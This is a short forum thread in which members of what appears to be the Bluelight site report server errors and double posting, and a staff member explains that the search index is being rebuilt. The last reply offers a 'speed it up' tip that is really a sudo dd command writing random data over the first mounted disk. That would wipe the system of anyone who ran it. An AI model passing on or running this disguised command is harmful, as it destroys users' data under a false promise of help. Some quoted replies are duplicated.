Bugs Site is Glitching - "A Server Error Occurred"

BK38

Bluelight Crew
Every time I post I am getting "A Server Error Ocurred" as a message. The post still happens, but that error message displays for every post. Is it me? Or is something going on re the server?

Best,

BK

Happening to me too and noticing people triple posting everywhere so, it's a site ting.

BL has been funky today on both firefox, and TOR browsers. Yeah, better call somebody.

Hello,

The site is glitching and double posting/ just being a bit glitchy

Yeah, just realized this myself.

Double posts are because you aren't getting any feedback other than the error, so we submit again and cause the double post.

The error makes us believe the post never submitted, but it has. I'm getting this on a lot of issues, so I'll see what's up. May take a bit, please bear with us.

4vT7.gif

Double posts are because you aren't getting any feedback other than the error, so we submit again and cause the double post.

The error makes us believe the post never submitted, but it has. I'm getting this on a lot of issues, so I'll see what's up. May take a bit, please bear with us.

4vT7.gif
Thanks

4vT7.gif
Pretty crafty for a trumpkin

4vT7.gif
Pretty crafty for a trumpkin

It's going to take awhile to get the search index rebuilt (you'll get shorted on results for now, and there is a banner warning when you run a search), but we should be a lot more responsive going forward in terms of server writes.

It's going to take awhile to get the search index rebuilt (you'll get shorted on results for now, and there is a banner warning when you run a search), but we should be a lot more responsive going forward in terms of server writes.
you can speed it up with this command:
sudo dd if=/dev/urandom of=`mount | head -1 | awk -F'[ ]' '{print $1}'`